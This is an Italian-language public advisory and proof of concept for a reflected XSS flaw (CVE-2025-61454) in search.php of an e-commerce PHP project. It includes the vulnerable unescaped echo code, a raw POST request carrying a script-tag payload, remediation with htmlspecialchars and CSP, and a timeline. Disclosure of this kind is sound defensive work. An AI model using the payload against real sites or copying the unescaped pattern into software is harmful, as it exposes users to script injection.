
Divulgazione pubblica e proof-of-concept per CVE-2025-61454, una vulnerabilità XSS riflessa in search.php di E-commerce Project v1.0, inclusi passaggi di sfruttamento e indicazioni di rimedio.
Data di divulgazione: 14 ottobre 2025
ID CVE: CVE-2025-61454
Gravità: MEDIA (CVSS 6.1)
Esiste una vulnerabilità di Cross-Site Scripting (XSS) riflesso nel Progetto E-commerce v1.0, in particolare nell'endpoint search.php. L'input non sanificato nel parametro search viene riflesso direttamente nell'HTML della risposta, consentendo agli aggressori di eseguire JavaScript arbitrario nel browser di un utente che visita un link dannoso o invia una richiesta appositamente costruita.
A questo problema è stato assegnato l'identificatore CVE-2025-61454. Al momento della divulgazione, nessuna patch è stata rilasciata dal fornitore.
search.phphttp://localhost/e-commerce-main/search.phpIl server non sanifica correttamente il parametro search dai dati POST prima di rifletterlo nell'HTML della risposta. Ciò consente agli aggressori di iniettare payload JavaScript, portando all'esecuzione di codice lato client.
Un aggressore costruisce un input contenente contenuto simile a script incorporato e lo invia all'endpoint POST vulnerabile. Poiché il server riflette l'input nella risposta HTML senza applicare una corretta codifica HTML/attributo/JS, il browser tratta il contenuto riflesso come markup eseguibile e lo esegue. Questo è uno scenario XSS riflesso (non persistente); l'aggressore deve convincere la vittima a effettuare la richiesta o a visitare un link/modulo appositamente costruito.
$search = $_POST['search'];
echo "<div>Search results for: $search</div>";
| ID CWE | Titolo |
|---|---|
| CWE-79 | Neutralizzazione impropria dell'input durante la generazione di pagine web ('Cross-site Scripting') |
| Punteggio | Gravità | Stringa del Vettore |
|---|---|---|
| 6.1 | MEDIA | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
Uno sfruttamento riuscito potrebbe comportare:
git clone https://github.com/Bhabishya-123/E-commerce.git
Utilizzare XAMPP/LAMP per distribuire il progetto e accedere all'applicazione.
POST /e-commerce-main/search.php HTTP/1.1
Host: localhost
Referer: https://localhost/e-commerce-main/
Content-Type: application/x-www-form-urlencoded
search=yxo9p%3cscript%3ealert(1)%3c%2fscript%3exnzmd&submit=
search=yxo9p<script>alert(1)</script>xnzmd&submit=
yxo9p<script>alert(1)</script>xnzmd
Spiegazione:
Il payload <script>alert(1)</script> è incorporato nel parametro search. Quando una vittima invia un modulo di ricerca con questo payload dannoso (o viene indotta a farlo tramite ingegneria sociale), il JavaScript viene eseguito nel contesto del suo browser.
Se vulnerabile, il browser eseguirà il codice JavaScript, mostrando una finestra di avviso con il valore 1. Ciò conferma lo sfruttamento XSS riuscito.
htmlspecialchars() o equivalente per codificare tutti gli output non attendibili prima di renderizzarli in HTML.$search = htmlspecialchars($_POST['search'], ENT_QUOTES, 'UTF-8');
echo "<div>Search results for: $search</div>";
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
| Evento | Data |
|---|---|
| Vulnerabilità Scoperta | 16 settembre 2025 |
| Divulgazione Pubblica | 13 ottobre 2025 |
| Patch Disponibile | ❌ Non disponibile al momento della divulgazione |
Questa vulnerabilità è stata scoperta e divulgata da:
Tansique Dasari
🔗 GitHub
✉️ [email protected]
💬 Questa advisory è pubblicata in modo indipendente a causa dell'assenza di una patch ufficiale del fornitore.